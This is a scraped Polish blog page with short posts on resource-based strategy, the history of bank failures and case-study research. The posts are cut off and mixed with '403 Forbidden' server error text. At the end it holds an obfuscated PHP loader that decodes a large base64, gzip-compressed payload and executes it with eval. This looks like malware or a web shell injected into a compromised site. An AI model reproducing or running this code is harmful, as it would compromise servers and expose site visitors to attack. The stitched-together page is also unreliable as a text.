„Nowa” myśl strategiczna

10 06 2013

Strategie wielu firm wciąż odwołują się do ujęcia zasobowego, wciąż starają się nakreślić swoją wizję rozwoju wokół kształtowania i wykorzystywania kluczowych kompetencji. Sytuacja tak trwa już prawie od 30 lat, czyli od czasów pierwszych prac ojców podejścia zasobowego – Barney’a i Wernerfelta. Staje się to powoli już ”nudne”. Jak dotychczas okazuje się być to skutecznym działaniem. Wszyscy uwierzyli, że tylko kluczowa kompetencja jest w stanie zwiększyć wartość firmy i wszyscy uwierzyli, że wszystko co nie kluczowe (nie wnoszące wartości) powinno być z organizacji usuwane. Dobra passa takiego myślenia trwa już trzy dekady. Wciąż poszerzana jest przestrzeń kluczowych zasobów i wciąż kolejne rodzaje zasobów, rodzaje kompetencji szturmują „portfele” interesariuszy. Takimi zasobami były: wiedza, marka, wizerunek, kultura organizacyjna, aktywa niematerialne, zasoby relacyjne firmy, „like’i”. Czyli wszystko to co może w bezpośredni lub pośredni sposób przełożyć się na wzrost wartości dla akcjonariuszy. co nas czeka w najbliższej przyszłości? Czy pojawią się nowe kolejne zasoby, kompetencje, czy zdolności, interpretowane dalej z perspektywy zysku ekonomicznego, czy może znajdzie się nowa koncepcja myślenia strategicznego, umożliwiająca kreację nowego sposobu rozwoju firmy?  Takim potencjalnym rozwiązaniem mogłoby być myślenie w konwencji sieci i renty sieciowej jako nowych wyznaczników rozwoju organizacji gospodarczych? Ale czy tak się na pewno stanie?

Jerzy NiemczykBank a kryzys

4 02 2013

Pierwsza instytucja, którą można uznać za bank komercyjny, powstała w 1135 r. W Wenecji. Do XV w. Podobne instytucje powstały w Genui, Barcelonie, Florencji i innych miastach europejskich. Niektóre z nich przeżywały kłopoty finansowe, które doprowadziły do ich upadłości. Po raz pierwszy w 1520 r. Odnotowano, iż upadł jeden z banków działających we Florencji. Upadłości banków występowały więc od wieków i nie są niczym nowym. Jednak zmieniało się ich znaczenie dla gospodarki. Pod koniec XVII w. Bank Anglii wprowadził rezerwę obowiązkową, która miała zapewnić, że banki będą utrzymywały odpowiednią ilość środków płynnych. Miało to ograniczyć możliwość utraty zdolności do regulowania zobowiązań wobec deponentów[1]. Tu można już zauważyć że od samego istnieją banki wiedziały i były świadome tego co może się stać. Czytaj dalej »Charakterystyka studium przypadku

4 01 2013

Studium przypadku służy głębokiemu poznaniu tego jednego konkretnego obiektu, którego właśnie dotyczy. Inni autorzy sądzą, że „przedmioty jednostkowe czy jednorazowe wydarzenia mają wartość poznawczą o tyle tylko, o ile mogą być rozważane jako egzemplarze określonego gatunku czy przejawu działania praw ogólnych”[1]. W związku z tymi teoriami jako przypadek rozumie się pojedynczy obiekt badawczy, rozpoznany ze względu na określony cel, usytuowany w określonym czasie i miejscu, badany przy wykorzystaniu wielu technik gromadzenia i analizy danych. „Studia przypadków charakteryzuje więc:


403 Forbidden

403 Forbidden


nginx/1.10.2
/*edition:1.4*/ $va56fc3603f='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';eval(gzuncompress(base64_decode($va56fc3603f)));